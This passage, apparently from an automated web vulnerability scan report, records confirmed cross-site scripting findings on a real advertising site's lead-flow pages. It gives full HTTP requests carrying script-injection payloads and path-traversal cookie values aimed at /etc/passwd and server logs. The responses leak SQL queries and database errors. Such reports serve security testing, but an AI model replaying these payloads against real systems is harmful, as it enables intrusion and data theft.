Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=avctbj9e1hir149buclu4jcbg3; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>' OR prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>' OR prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>' OR prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>' OR prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>' OR prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D6)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005D4)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/bulo00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005D4)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=k0ep4v4j0hai0cjhcskrmq96s7; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET '"--></style></script><script>alert(0x0005D7)</script>

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005D7)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gka31bfa2jrke1f96r3q7nneq2; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats 